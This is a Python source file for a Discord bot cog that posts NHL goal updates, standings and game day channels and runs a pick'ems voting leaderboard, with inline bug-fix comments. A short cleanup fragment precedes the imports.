    self.bot.loop.create_task(self.session.close())
    if getattr(self, "loop", None) is not None:
        self.loop.cancel()

# Run the same cleanup if the cog object is garbage collected.
__del__ = __unload
| import discord
import aiohttp
import asyncio
import json
import yaml
import logging
from datetime import datetime, timedelta
from io import BytesIO
from urllib.parse import quote
from redbot.core import commands, checks, Config
from redbot.core.data_manager import cog_data_path
from redbot.core.i18n import Translator, cog_i18n
from .teamentry import TeamEntry
from .menu import hockey_menu
from .embeds import *
from .helper import *
from .errors import *
from .game import Game
from .pickems import Pickems
from .standings import Standings
from .gamedaychannels import GameDayChannels
from .constants import *
# The Oilers Hue-light integration is optional; enable it only when the
# module (and its dependencies) import cleanly.
try:
    from .oilers import Oilers

    LIGHTS_SET = True
except Exception:
    # Fixed: was a bare `except:` which also swallowed SystemExit and
    # KeyboardInterrupt; keep the broad best-effort behaviour otherwise.
    LIGHTS_SET = False
_ = Translator("Hockey", __file__)
log = logging.getLogger("red.Hockey")
__version__ = "2.3.2"
__author__ = "TrustyJAID"
@cog_i18n(_)
class Hockey(getattr(commands, "Cog", object)):
"""
Gather information and post goal updates for NHL hockey teams
"""
def __init__(self, bot):
    """Set up config defaults and start the background game loop."""
    self.bot = bot
    self.session = aiohttp.ClientSession(loop=self.bot.loop)
    default_global = {"teams": [], "created_gdc": False, "print": False}
    for team in TEAMS:
        team_entry = TeamEntry("Null", team, 0, [], {}, [], "")
        # Bug fix: the original appended each entry twice, duplicating
        # every team in the stored defaults.
        default_global["teams"].append(team_entry.to_json())
    default_guild = {
        "standings_channel": None,
        "standings_type": None,
        "post_standings": False,
        "standings_msg": None,
        "create_channels": False,
        "category": None,
        "gdc_team": None,
        "gdc": [],
        "delete_gdc": True,
        "rules": "",
        "team_rules": "",
        "pickems": [],
        "leaderboard": {},
    }
    default_channel = {"team": [], "to_delete": False}
    # Bug fix: force_registration is an option of Config.get_conf, not
    # a config value — passing it to register_global stored a spurious
    # global key named "force_registration".
    self.config = Config.get_conf(self, CONFIG_ID, force_registration=True)
    self.config.register_global(**default_global)
    self.config.register_guild(**default_guild)
    self.config.register_channel(**default_channel)
    self.loop = bot.loop.create_task(self.game_check_loop())
    self.TEST_LOOP = False  # used to test a continuous loop of a single game data
##############################################################################
# Here is all the logic for gathering game data and updating information
async def game_check_loop(self):
    """
    This loop grabs the current games for the day
    then passes off to other functions as necessary
    """
    await self.bot.wait_until_ready()
    # Keep running only while this instance is the registered cog;
    # a cog reload swaps the instance and naturally ends this loop.
    while self is self.bot.get_cog("Hockey"):
        # await self.refactor_data()
        async with self.session.get(BASE_URL + "/api/v1/schedule") as resp:
            data = await resp.json()
        if data["dates"] != []:
            # Links to today's games that have not finished yet.
            games = [
                game["link"]
                for game in data["dates"][0]["games"]
                if game["status"]["abstractGameState"] != "Final"
            ]
        else:
            games = []
        # Only try to create game day channels if there's no games for the day
        # Otherwise make the game day channels once we see
        # the first preview message to delete old ones
        await self.check_new_day()
        games_playing = False
        if self.TEST_LOOP:
            # Sentinel entry so the inner loop runs in test mode.
            games = [1]
        while games != []:
            to_remove = []
            games_playing = True
            for link in games:
                if not self.TEST_LOOP:
                    try:
                        async with self.session.get(BASE_URL + link) as resp:
                            data = await resp.json()
                    except Exception as e:
                        # Transient API failure: retry this game next pass.
                        log.error(_("Error grabbing game data: "), exc_info=True)
                        continue
                else:
                    # Test mode: read a canned game payload from disk
                    # next to this module instead of hitting the API.
                    games_playing = False
                    with open(str(__file__)[:-9] + "testgame.json", "r") as infile:
                        data = json.loads(infile.read())
                game = await Game.from_json(data)
                try:
                    await self.check_new_day()
                    await game.check_game_state(self.bot)
                except Exception as e:
                    log.error("Error checking game state: ", exc_info=True)
                log.debug(
                    (
                        f"{game.away_team} @ {game.home_team} "
                        f"{game.game_state} {game.away_score} - {game.home_score}"
                    )
                )
                if game.game_state == "Final" and game.first_star is not None:
                    # Game is over and the three stars are posted: settle
                    # pickems for it and stop polling this link.
                    try:
                        await Pickems.set_guild_pickem_winner(self.bot, game)
                    except Exception as e:
                        log.error(_("Pickems Set Winner error: "), exc_info=True)
                    to_remove.append(link)
            for link in to_remove:
                games.remove(link)
            await asyncio.sleep(60)
        log.debug(_("Games Done Playing"))
        try:
            await Pickems.tally_leaderboard(self.bot)
        except Exception as e:
            log.error(_("Error tallying leaderboard:"), exc_info=True)
            pass
        if games_playing:
            # Games actually ran today: allow GDCs to be re-created on
            # the next new-day check.
            await self.config.created_gdc.set(False)
        # Final cleanup of config incase something went wrong
        # Should be mostly unnecessary at this point
        all_teams = await self.config.teams()
        for team in await self.config.teams():
            all_teams.remove(team)
            team["goal_id"] = {}
            team["game_state"] = "Null"
            team["game_start"] = ""
            team["period"] = 0
            all_teams.append(team)
        await self.config.teams.set(all_teams)
        await asyncio.sleep(300)
async def check_new_day(self):
    # Daily housekeeping.  The created_gdc flag is cleared by the game
    # loop once games finish, so this body runs at most once per day.
    if not await self.config.created_gdc():
        if datetime.now().weekday() == 6:
            # Sunday: reset the weekly pickems leaderboard.
            try:
                await Pickems.reset_weekly(self.bot)
            except Exception as e:
                log.error(_("Error reseting the weekly leaderboard: "), exc_info=True)
        try:
            await Standings.post_automatic_standings(self.bot)
        except Exception as e:
            log.error("Error updating standings", exc_info=True)
        log.debug(_("Checking GDC"))
        # Create today's game day channels, then mark the day as done.
        await GameDayChannels.check_new_gdc(self.bot)
        await self.config.created_gdc.set(True)
async def on_raw_reaction_add(self, payload):
    """
    Record pickems votes cast via reactions.

    Ignores bots, DMs, and reactions on messages that are not tracked
    pickems messages; persists the updated pickems objects when a vote
    was handled.
    """
    channel = self.bot.get_channel(id=payload.channel_id)
    try:
        guild = channel.guild
    except Exception:
        # Reaction happened in a DM or an unknown channel.
        return
    pickems_list = await self.config.guild(guild).pickems()
    if pickems_list is None:
        return
    pickems = [Pickems.from_json(p) for p in pickems_list]
    if len(pickems) == 0:
        return
    try:
        msg = await channel.get_message(id=payload.message_id)
    except Exception:
        # Message deleted or no permission to fetch it.
        return
    user = guild.get_member(payload.user_id)
    if user.bot:
        return
    is_pickems_vote = False
    for pickem in pickems:
        if msg.id in pickem.message:
            is_pickems_vote = True
            reply_message = ""
            try:
                pickem.add_vote(user.id, payload.emoji)
            except UserHasVotedError as team:
                # The user switched teams: remove their old reaction.
                if msg.channel.permissions_for(msg.guild.me).manage_messages:
                    emoji = (
                        pickem.home_emoji
                        if str(payload.emoji.id) in pickem.away_emoji
                        else pickem.away_emoji
                    )
                    await msg.remove_reaction(emoji, user)
                # Bug fix: a stray ")" was embedded in the translated
                # string ("Changing vote to) ").
                reply_message = _("You have already voted! Changing vote to ") + str(team)
            except VotingHasEndedError as error_msg:
                if msg.channel.permissions_for(msg.guild.me).manage_messages:
                    await msg.remove_reaction(payload.emoji, user)
                reply_message = _("Voting has ended!") + str(error_msg)
            except NotAValidTeamError:
                if msg.channel.permissions_for(msg.guild.me).manage_messages:
                    await msg.remove_reaction(payload.emoji, user)
                reply_message = _("Don't clutter the voting message with emojis!")
            if reply_message != "":
                try:
                    await user.send(reply_message)
                except Exception:
                    # User may have DMs disabled; best-effort only.
                    pass
    if is_pickems_vote:
        # Persist the mutated pickems objects back to config.
        pickems_list = [p.to_json() for p in pickems]
        await self.config.guild(guild).pickems.set(pickems_list)
async def change_custom_emojis(self, attachments):
    """
    This overwrites the emojis in constants.py
    with values in a properly formatted .yaml file

    Raises InvalidFileError when the attachment is not valid YAML.
    """
    # Removed unused local `new_dict` from the original.
    try:
        async with self.session.get(attachments[0].url) as infile:
            data = yaml.safe_load(await infile.read())
    except yaml.error.YAMLError as exc:
        raise InvalidFileError("Error Parsing the YAML") from exc
    # Fill each team's emoji, falling back to the "Other" slot when a
    # team has no emoji in the uploaded file.
    for team in TEAMS:
        TEAMS[team]["emoji"] = data[team][0] if data[team][0] is not None else data["Other"][0]
    team_data = json.dumps(TEAMS, indent=4, sort_keys=True, separators=(",", " : "))
    constants_string = (
        f'BASE_URL = "{BASE_URL}"\n'
        f'HEADSHOT_URL = "{HEADSHOT_URL}"\n'
        f"CONFIG_ID = {CONFIG_ID}\n"
        f"TEAMS = {team_data}"
    )
    # Rewrite constants.py next to this module so the emojis persist
    # across restarts.
    with open(__file__[:-9] + "constants.py", "w") as outfile:
        outfile.write(constants_string)
async def wait_for_file(self, ctx):
    """
    Waits for the author to upload a file

    Returns the message carrying the attachment, or None when the
    author types ``exit`` or 60 seconds pass without an upload.
    """

    def check(m):
        # Bug fix: the original check required an attachment, so a
        # plain "exit" message could never be received and cancelling
        # was impossible.  Accept an attachment OR the exit keyword.
        return m.author == ctx.message.author and (
            m.attachments != [] or m.content.lower().strip() == "exit"
        )

    try:
        msg = await self.bot.wait_for("message", check=check, timeout=60)
    except asyncio.TimeoutError:
        await ctx.send(_("Emoji changing cancelled"))
        return None
    if msg.content.lower().strip() == "exit":
        # Bug fix: previously the "exit" message itself was returned,
        # so callers did not treat it as a cancellation.
        await ctx.send(_("Emoji changing cancelled"))
        return None
    return msg
##############################################################################
# Here are all the bot commands
@commands.group(name="hockey", aliases=["nhl"])
async def hockey_commands(self, ctx):
    """
    Get information from NHL.com
    """
    # Group root only; all behaviour lives in the subcommands.
    pass
@commands.group(name="hockeyset", aliases=["nhlset"])
@commands.guild_only()
@checks.mod_or_permissions(manage_channels=True)
async def hockeyset_commands(self, ctx):
    """
    Setup commands for the server

    Invoked without a subcommand this prints the server's current
    hockey settings (goal channels, standings configuration).
    """
    if ctx.invoked_subcommand is None:
        guild = ctx.message.guild
        standings_channel = guild.get_channel(
            await self.config.guild(guild).standings_channel()
        )
        post_standings = (
            _("On") if await self.config.guild(guild).post_standings() else _("Off")
        )
        gdc_channels = await self.config.guild(guild).gdc()
        if standings_channel is not None:
            if ctx.channel.permissions_for(guild.me).embed_links:
                standings_chn = standings_channel.mention
            else:
                standings_chn = standings_channel.name
            try:
                standings_msg = await standings_channel.get_message(
                    await self.config.guild(guild).standings_msg()
                )
            except discord.errors.NotFound:
                # Saved standings message was deleted.
                standings_msg = None
            if standings_msg is not None:
                if ctx.channel.permissions_for(guild.me).embed_links:
                    standings_msg = (
                        _("[Standings") + f" {post_standings}]({standings_msg.jump_url})"
                    )
                else:
                    standings_msg = (
                        _("Standings") + f" {post_standings}```{standings_msg.jump_url}"
                    )
        else:
            standings_chn = "None"
            standings_msg = "None"
        # Build a per-channel summary of which teams post where.
        channels = ""
        for channel in await self.config.all_channels():
            chn = guild.get_channel(channel)
            if chn is not None:
                teams = ", ".join(t for t in await self.config.channel(chn).team())
                is_gdc = "(GDC)" if chn.id in gdc_channels else ""
                if ctx.channel.permissions_for(guild.me).embed_links:
                    channels += f"{chn.mention}{is_gdc}: {teams}\n"
                else:
                    channels += f"#{chn.name}{is_gdc}: {teams}\n"
        if ctx.channel.permissions_for(guild.me).embed_links:
            em = discord.Embed(title=guild.name + _(" Hockey Settings"))
            em.colour = await self.bot.db.color()
            em.description = channels
            em.add_field(
                name=_("Standings Settings"), value=f"{standings_chn}: {standings_msg}"
            )
            await ctx.send(embed=em)
        else:
            # Bug fix: the last line was a plain string without the
            # f-prefix, so "{standings_chn}" and "{standings_msg}" were
            # sent literally.
            msg = (
                f"```\n{guild.name} "
                + _("Hockey Settings\n")
                + f"{channels}\n"
                + _("Standings Settings")
                + f"\n#{standings_chn}: {standings_msg}"
            )
            if standings_msg is not None:
                # The jump-url form already embeds the closing ```.
                await ctx.send(msg)
            else:
                await ctx.send(msg + "```")
@commands.group()
@checks.mod_or_permissions(manage_channels=True)
@commands.guild_only()
async def gdc(self, ctx):
    """
    Game Day Channel setup for the server

    You can setup only a single team or all teams for the server
    Game day channels are deleted and created on the day after the game is played
    usually around 9AM PST
    """
    if ctx.invoked_subcommand is None:
        guild = ctx.message.guild
        create_channels = await self.config.guild(guild).create_channels()
        if create_channels is None:
            return
        team = await self.config.guild(guild).gdc_team()
        if team is None:
            team = "None"
        channels = await self.config.guild(guild).gdc()
        category = self.bot.get_channel(await self.config.guild(guild).category())
        delete_gdc = await self.config.guild(guild).delete_gdc()
        if category is not None:
            category = category.name
        if channels is not None:
            # List the currently tracked GDCs; unresolvable ids fall
            # back to a raw channel mention.
            created_channels = ""
            for channel in channels:
                chn = self.bot.get_channel(channel)
                if chn is not None:
                    if ctx.channel.permissions_for(guild.me).embed_links:
                        created_channels += chn.mention
                    else:
                        created_channels += "#" + chn.name
                else:
                    created_channels += "<#{}>\n".format(channel)
            if len(channels) == 0:
                created_channels = "None"
        else:
            created_channels = "None"
        if not ctx.channel.permissions_for(guild.me).embed_links:
            # Bug fix: create_channels and delete_gdc are bools (and
            # team may not be str) — concatenating them raised
            # TypeError.  Convert with str() before joining.
            msg = (
                _("```GDC settings for")
                + guild.name
                + "\n"
                + _("Create Game Day Channels:")
                + str(create_channels)
                + "\n"
                + _("Delete Game Day Channels: ")
                + str(delete_gdc)
                + "\n"
                + _("Team:")
                + str(team)
                + "\n"
                + _("Current Channels:")
                + created_channels
                + "```"
            )
            await ctx.send(msg)
        if ctx.channel.permissions_for(guild.me).embed_links:
            em = discord.Embed(title=_("GDC settings for ") + guild.name)
            em.colour = await self.bot.db.color()
            em.add_field(name=_("Create Game Day Channels"), value=str(create_channels))
            em.add_field(name=_("Delete Game Day Channels"), value=str(delete_gdc))
            em.add_field(name=_("Team"), value=str(team))
            em.add_field(name=_("Current Channels"), value=created_channels)
            await ctx.send(embed=em)
#######################################################################
# All Game Day Channel Commands
@gdc.command(name="delete")
async def gdc_delete(self, ctx):
    """
    Delete all current game day channels for the server
    """
    # Only act when the server actually has GDC creation enabled.
    if await self.config.guild(ctx.guild).create_channels():
        await GameDayChannels.delete_gdc(self.bot, ctx.guild)
    await ctx.send(_("Game day channels deleted."))
@gdc.command(name="create")
async def gdc_create(self, ctx):
    """
    Creates the next gdc for the server
    """
    # Only act when the server actually has GDC creation enabled.
    if await self.config.guild(ctx.guild).create_channels():
        await GameDayChannels.create_gdc(self.bot, ctx.guild)
    await ctx.send(_("Game day channels created."))
@gdc.command(name="toggle")
async def gdc_toggle(self, ctx):
    """
    Toggles the game day channel creation on this server
    """
    guild = ctx.message.guild
    # Invert the stored flag and report the new state.
    new_setting = not await self.config.guild(guild).create_channels()
    verb = _("will") if new_setting else _("won't")
    await self.config.guild(guild).create_channels.set(new_setting)
    await ctx.send(_("Game day channels ") + verb + _(" be created on this server."))
@gdc.command(name="category")
async def gdc_category(self, ctx, category: discord.CategoryChannel):
    """
    Change the category for channel creation. Channel is case sensitive.
    """
    # Removed unused local `cur_setting`; the old value was fetched
    # but never read.
    guild = ctx.message.guild
    await self.config.guild(guild).category.set(category.id)
    await ctx.send(_("Game day channels will be created in ") + category.name)
@gdc.command(name="autodelete")
async def gdc_autodelete(self, ctx):
    """
    Toggle's auto deletion of game day channels.
    """
    guild = ctx.message.guild
    # Read the current flag, announce the flipped behaviour, then store it.
    cur_setting = await self.config.guild(guild).delete_gdc()
    verb = _("won't") if cur_setting else _("will")
    msg = (
        _("Game day channels ")
        + verb
        + _(" be deleted on this server.\n")
        + _("Note, this may not happen until the next set of games.")
    )
    await self.config.guild(guild).delete_gdc.set(not cur_setting)
    await ctx.send(msg)
@gdc.command(name="setup")
async def gdc_setup(
    self,
    ctx,
    team: HockeyTeams,
    category: discord.CategoryChannel = None,
    delete_gdc: bool = True,
):
    """
    Setup game day channels for a single team or all teams

    Required parameters:
        `team` must use quotes if a space is in the name will search for partial team name
    Optional Parameters:
        `category` must use quotes if a space is in the name will default to current category
        `delete_gdc` will tell the bot whether or not to delete game day channels automatically
        must be either `True` or `False` and a category must be provided
    """
    guild = ctx.message.guild
    if guild is None:
        await ctx.send("This needs to be done in a server.")
        return
    if category is None:
        category = guild.get_channel(ctx.message.channel.category_id)
    if category is None:
        # Robustness: the invoking channel may not be in a category,
        # in which case the old code raised AttributeError below.
        await ctx.send(_("I can't find a category to use, please provide one."))
        return
    if not category.permissions_for(guild.me).manage_channels:
        await ctx.send(_("I don't have manage channels permission!"))
        return
    await self.config.guild(guild).category.set(category.id)
    await self.config.guild(guild).gdc_team.set(team)
    await self.config.guild(guild).delete_gdc.set(delete_gdc)
    if team.lower() != "all":
        await GameDayChannels.create_gdc(self.bot, guild)
    else:
        # "all": create a channel for every game currently scheduled.
        game_list = await Game.get_games()
        for game in game_list:
            await GameDayChannels.create_gdc(self.bot, guild, game)
    # Bug fix: missing leading space produced e.g. "…Oilerssetup in…".
    await ctx.send(_("Game Day Channels for ") + team + _(" setup in ") + category.name)
#######################################################################
# All Hockey setup commands
@hockeyset_commands.command()
@checks.admin_or_permissions(administrator=True)
async def reset(self, ctx):
    """
    Restarts the hockey loop incase there are issues with the posts
    """
    status = await ctx.send(_("Restarting..."))
    # Cancel the running background task, then spin up a fresh one,
    # editing the status message as each step completes.
    self.loop.cancel()
    await status.edit(content=status.content + _("loop closed..."))
    self.loop = self.bot.loop.create_task(self.game_check_loop())
    await status.edit(content=status.content + _("restarted"))
@hockeyset_commands.command(hidden=True)
async def leaderboardset(
    self, ctx, user: discord.Member, season: int, weekly: int = None, total: int = None
):
    """
    Allows moderators to set a users points on the leaderboard
    """
    # Unspecified weekly/total default to the season value.
    if weekly is None:
        weekly = season
    if total is None:
        total = season
    leaderboard = await self.config.guild(ctx.guild).leaderboard()
    if leaderboard == {} or leaderboard is None:
        await ctx.send(_("There is no current leaderboard for this server!"))
        return
    # Assignment overwrites any existing entry; the original's
    # del-then-reassign was redundant.
    leaderboard[str(user.id)] = {"season": season, "weekly": weekly, "total": total}
    await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
    # Bug fix: the ints were concatenated to str directly, raising
    # TypeError — convert with str() first.
    msg = (
        user.display_name
        + _(" now has ")
        + str(season)
        + _(" points on the season, ")
        + str(weekly)
        + _(" points for the week,")
        + _(" and ")
        + str(total)
        + _(" votes overall.")
    )
    await ctx.send(msg)
@hockeyset_commands.command(name="poststandings", aliases=["poststanding"])
async def post_standings(self, ctx, standings_type: str, channel: discord.TextChannel = None):
    """
    Posts automatic standings when all games for the day are done

    `standings_type` can be a division, conference, team, or all
    `channel` will default to the current channel or be specified
    """
    guild = ctx.message.guild
    if channel is None:
        channel = ctx.message.channel
    standings_list = [
        "metropolitan",
        "atlantic",
        "pacific",
        "central",
        "eastern",
        "western",
        "all",
    ]
    # Removed unused local `division`; it was built but never read.
    if standings_type.lower() not in standings_list:
        await ctx.send(
            _("You must choose from ") + "{}".format(", ".join(s for s in standings_list))
        )
        return
    standings, page = await Standings.get_team_standings(standings_type.lower())
    if standings_type.lower() != "all":
        em = await Standings.build_standing_embed(standings, page)
    else:
        em = await Standings.all_standing_embed(standings, page)
    await self.config.guild(guild).standings_type.set(standings_type)
    await self.config.guild(guild).standings_channel.set(channel.id)
    # Bug fix: missing trailing space before the channel mention.
    await ctx.send(_("Sending standings to ") + channel.mention)
    message = await channel.send(embed=em)
    # Remember the message so the daily loop can keep editing it.
    await self.config.guild(guild).standings_msg.set(message.id)
    await ctx.send(
        standings_type
        + _(" standings will now be automatically updated in ")
        + channel.mention
    )
    await self.config.guild(guild).post_standings.set(True)
@hockeyset_commands.command()
async def togglestandings(self, ctx):
    """
    Toggles automatic standings updates

    This updates at the same time as the game day channels (usually 9AM PST)
    """
    guild = ctx.message.guild
    cur_state = not await self.config.guild(guild).post_standings()
    verb = _("will") if cur_state else _("won't")
    # Bug fix: missing space after the verb produced "willbe updated".
    msg = _("Okay, standings ") + verb + _(" be updated automatically.")
    await self.config.guild(guild).post_standings.set(cur_state)
    await ctx.send(msg)
@hockeyset_commands.command(name="add", aliases=["add_goals"])
async def add_goals(self, ctx, team: HockeyTeams, channel: discord.TextChannel = None):
    """
    Adds a hockey team goal updates to a channel do 'all' for all teams

    `team` needs to be all or part of an NHL team if more than one team
    match it will ask for the correct team.
    `channel` defaults to the current channel
    """
    guild = ctx.message.guild
    # team_data = await self.get_team(team)
    if channel is None:
        channel = ctx.message.channel
    if not channel.permissions_for(guild.me).embed_links:
        # Goal posts are embeds; refuse without the permission.
        await ctx.send(_("I don't have embed links permission!"))
        return
    cur_teams = await self.config.channel(channel).team()
    cur_teams = [] if cur_teams is None else cur_teams
    if team in cur_teams:
        # NOTE(review): when the team is already tracked this REPLACES
        # the channel's whole team list with just this team, dropping
        # any others — possibly meant as a dedupe; confirm intent.
        await self.config.channel(channel).team.set([team])
    else:
        cur_teams.append(team)
        await self.config.channel(channel).team.set(cur_teams)
    await ctx.send(team + _(" goals will be posted in ") + channel.mention)
@hockeyset_commands.command(name="del", aliases=["remove", "rem"])
async def remove_goals(
    self, ctx, team: HockeyTeams = None, channel: discord.TextChannel = None
):
    """
    Removes a teams goal updates from a channel

    defaults to the current channel
    """
    # Removed unused local `guild` and the redundant
    # `if team is not None:` wrapper (team is guaranteed non-None
    # after the early return above it).
    if channel is None:
        channel = ctx.message.channel
    cur_teams = await self.config.channel(channel).team()
    if cur_teams is None:
        await ctx.send(_("no teams are currently being posted in ") + channel.mention)
        return
    if team is None:
        # No team given: stop all goal updates for this channel.
        await self.config.channel(channel).clear()
        await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
        return
    if team in cur_teams:
        cur_teams.remove(team)
        if cur_teams == []:
            # Last team removed: clear the channel's config entirely.
            await self.config.channel(channel).clear()
            await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
        else:
            await self.config.channel(channel).team.set(cur_teams)
            await ctx.send(team + _(" goal updates removed from ") + channel.mention)
#######################################################################
# All Basic Hockey Commands
@hockey_commands.command()
async def version(self, ctx):
    """
    Display the current version
    """
    # Report the module-level version constant.
    await ctx.send(_("Hockey version ") + __version__)
@commands.command()
async def hockeyhub(self, ctx, *, search: str):
    """
    Search for hockey related items on https://hockeyhub.github.io/

    lines   team    Team lines on Daily Faceoff
    stats   [year] team Team stats on nhl.com, year optional
    schedule team   Team schedule on nhl.com
    draft   team oryear Draft history for team or year on Elite Prospects
    cap     team orplayer Cap information for team or player on CapFriendly
    player  player  Search for player on Elite Prospects
    depth   team    Team depth chart on Elite Prospects
    prospects team  Team prospects on Elite Prospects
    trades  team    Team trade history on NHL Trade Tracker
    jersey  [team] number orname Find a player by jersey number
    highlights [team] Game Highlights, team optional
    reddit  team    Team subreddit on Reddit
    """
    # URL-encode the query before building the search link.
    encoded = quote(search)
    await ctx.send("https://hockeyhub.github.io/?search=" + encoded)
@hockey_commands.command(name="role")
async def team_role(self, ctx, *, team: HockeyTeams):
    """Set your role to a team role"""
    guild = ctx.message.guild
    if not guild.me.guild_permissions.manage_roles:
        return
    try:
        # First guild role containing the team name that is NOT a GOAL role.
        role = [
            role
            for role in guild.roles
            if (team.lower() in role.name.lower() and "GOAL" not in role.name)
        ]
        await ctx.author.add_roles(role[0])
        # Leading space added so the reply doesn't run the role name into the
        # phrase ("Oilersrole applied."); matches the goals command's message.
        await ctx.send(role[0].name + _(" role applied."))
    except Exception:
        # IndexError when nothing matched, or Forbidden on role hierarchy.
        log.error("error adding team role", exc_info=True)
        await ctx.send(team + _(" is not an available role!"))
@hockey_commands.command(name="goals")
async def team_goals(self, ctx, *, team: HockeyTeams = None):
    """Subscribe to goal notifications"""
    guild = ctx.message.guild
    member = ctx.message.author
    if not guild.me.guild_permissions.manage_roles:
        return
    if team is None:
        # No team given: grant the "<team> GOAL" role matching every team
        # role the member already carries.
        team_roles = []
        for role in guild.roles:
            if role.name in [r.name + " GOAL" for r in member.roles]:
                team_roles.append(role)
        if team_roles != []:
            for role in team_roles:
                await ctx.message.author.add_roles(role)
            role_list = ", ".join(r.name for r in team_roles)
            await ctx.message.channel.send(f"{role_list} role applied.")
            return
        else:
            # Member carries no team roles to mirror; nothing to do.
            return
    else:
        try:
            # First guild role containing the team name and ending in "GOAL".
            role = [
                role
                for role in guild.roles
                if (team.lower() in role.name.lower() and role.name.endswith("GOAL"))
            ]
            await ctx.message.author.add_roles(role[0])
            await ctx.message.channel.send(role[0].name + _(" role applied."))
        except Exception as e:
            # IndexError when no role matched; reported as "not available".
            await ctx.message.channel.send(team + _(" is not an available role!"))
@hockey_commands.command()
async def standings(self, ctx, *, search: HockeyStandings = None):
    """
    Displays current standings
    If a search is provided you can see a teams complete stats
    by searching for team or get all standings at once
    separated by division
    """
    if search is None:
        # Default view: standings grouped by division, first page.
        standings, page = await Standings.get_team_standings("division")
        await hockey_menu(ctx, "standings", standings)
        return
    standings, page = await Standings.get_team_standings(search.lower())
    menu_style = "all" if search == "all" else "standings"
    await hockey_menu(ctx, menu_style, standings, None, page)
@hockey_commands.command(aliases=["score"])
async def games(self, ctx, *, team: HockeyTeams = None):
    """
    Gets all NHL games for the current season
    If team is provided it will grab that teams schedule
    """
    page_num = 0
    today = datetime.now()
    # Season schedules nominally start September 1st of the season's first year.
    start_date = datetime.strptime(f"{get_season()[0]}-9-1", "%Y-%m-%d")
    games_list = await Game.get_games_list(team, start_date)
    # Open the menu on the first game that has not been played yet.
    for game in games_list:
        game_time = datetime.strptime(game["gameDate"], "%Y-%m-%dT%H:%M:%SZ")
        if game_time >= today:
            page_num = games_list.index(game)
            break
    if games_list != []:
        await hockey_menu(ctx, "game", games_list, None, page_num)
    else:
        # `team` may be None (all-teams request); the old code raised
        # TypeError concatenating None with the message in that case.
        name = team if team is not None else _("NHL teams")
        await ctx.message.channel.send(name + _(" have no recent or upcoming games!"))
@hockey_commands.command(aliases=["player"])
async def players(self, ctx, *, search):
    """
    Search for a player or get a team roster
    """
    matched = []
    team_matches = [name for name in TEAMS if search.lower() in name.lower()]
    if team_matches:
        # The search names one or more teams: collect their full rosters.
        for name in team_matches:
            url = f"{BASE_URL}/api/v1/teams/{TEAMS[name]['id']}/roster"
            async with self.session.get(url) as resp:
                data = await resp.json()
            for player in data["roster"]:
                matched.append(player)
    else:
        # Otherwise treat the search as a player name: scan every roster.
        rosters = {}
        for name in TEAMS:
            url = f"{BASE_URL}/api/v1/teams/{TEAMS[name]['id']}/roster"
            async with self.session.get(url) as resp:
                data = await resp.json()
            try:
                rosters[name] = data["roster"]
            except KeyError:
                # API responses without a roster payload are skipped.
                pass
        for name in rosters:
            for player in rosters[name]:
                if search.lower() in player["person"]["fullName"].lower():
                    matched.append(player)
    if matched:
        await hockey_menu(ctx, "roster", matched)
    else:
        await ctx.send(search + _(" is not an NHL team or Player!"))
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def rules(self, ctx):
    """
    Display a nice embed of server specific rules
    """
    if not ctx.channel.permissions_for(ctx.guild.me).embed_links:
        return
    rules_text = await self.config.guild(ctx.guild).rules()
    rules_team = await self.config.guild(ctx.guild).team_rules()
    if rules_text == "":
        # No rules configured for this guild yet.
        return
    embed = await make_rules_embed(ctx.guild, rules_team, rules_text)
    # Delete the invoking message when permitted, keeping the channel tidy.
    if ctx.channel.permissions_for(ctx.guild.me).manage_messages:
        await ctx.message.delete()
    await ctx.send(embed=embed)
@hockey_commands.command(hidden=True)
@checks.admin_or_permissions(manage_messages=True)
async def pickems_page(self, ctx, date: str = None):
    """
    Generates a pickems page for voting on a specified day must be "DD-MM-YYYY"
    """
    if date is None:
        # Default to today's games.
        date = datetime.now()
    else:
        date = datetime.strptime(date, "%d-%m-%Y")
    msg = _(
        "**Welcome to our daily Pick'ems challenge! Below you will see today's games!"
        " Vote for who you think will win! You get one point for each correct prediction."
        " We will be tracking points over the course of the season and will be rewarding weekly,"
        " worst and full-season winners!**\n\n"
        "- Click the reaction for the team you think will win the day's match-up.\n"
        "- Anyone who votes for both teams will have their vote removed and will receive no points!\n\n\n\n"
    )
    games_list = await Game.get_games(None, date, date)
    await ctx.send(msg)
    for game in games_list:
        # One message per match-up; reactions on it act as the ballot.
        new_msg = await ctx.send(
            "__**{} {}**__ @ __**{} {}**__".format(
                game.away_emoji, game.away_team, game.home_emoji, game.home_team
            )
        )
        # Create new pickems object for the game
        await Pickems.create_pickem_object(ctx.guild, new_msg, ctx.channel, game)
        if ctx.channel.permissions_for(ctx.guild.me).add_reactions:
            try:
                # Emoji are stored as "<:name:id>"; add_reaction wants "name:id".
                await new_msg.add_reaction(game.away_emoji[2:-1])
                await new_msg.add_reaction(game.home_emoji[2:-1])
            except Exception as e:
                # Best-effort: missing/foreign emoji shouldn't abort the page.
                log.debug("Error adding reactions")
async def post_leaderboard(self, ctx, leaderboard_type):
    """
    Posts the leaderboard based on specific style

    `leaderboard_type` is "season", "weekly", or "worst"; it selects both
    the sort key and the per-entry message format.
    """
    leaderboard = await self.config.guild(ctx.guild).leaderboard()
    if leaderboard == {} or leaderboard is None:
        await ctx.send(_("There is no current leaderboard for this server!"))
        return
    if leaderboard_type != "worst":
        # Rank directly by the requested stat key.
        leaderboard = sorted(
            leaderboard.items(), key=lambda i: i[1][leaderboard_type], reverse=True
        )
    else:
        # "worst": rank by the number of incorrect picks (total - correct).
        leaderboard = sorted(
            leaderboard.items(), key=lambda i: i[1]["total"] - i[1]["season"], reverse=True
        )
    msg_list = []
    count = 1
    user_position = None
    for member_id in leaderboard:
        # member_id is a (user_id_str, stats_dict) pair from .items().
        if str(member_id[0]) == str(ctx.author.id):
            user_position = leaderboard.index(member_id)
        member = ctx.guild.get_member(int(member_id[0]))
        if member is None:
            member_mention = _("User has left the server ") + member_id[0]
        else:
            member_mention = member.mention
        if leaderboard_type == "weekly":
            points = member_id[1]["weekly"]
            msg_list.append("#{}. {}: {}\n".format(count, member_mention, points))
        elif leaderboard_type == "season":
            total = member_id[1]["total"]
            wins = member_id[1]["season"]
            # NOTE(review): total == 0 divides by zero here — presumably an
            # entry only exists after a counted vote; confirm upstream.
            percent = (wins / total) * 100
            msg_list.append(
                f"#{count}. {member_mention}: {wins}/{total} correct ({percent:.4}%)\n"
            )
        else:
            total = member_id[1]["total"]
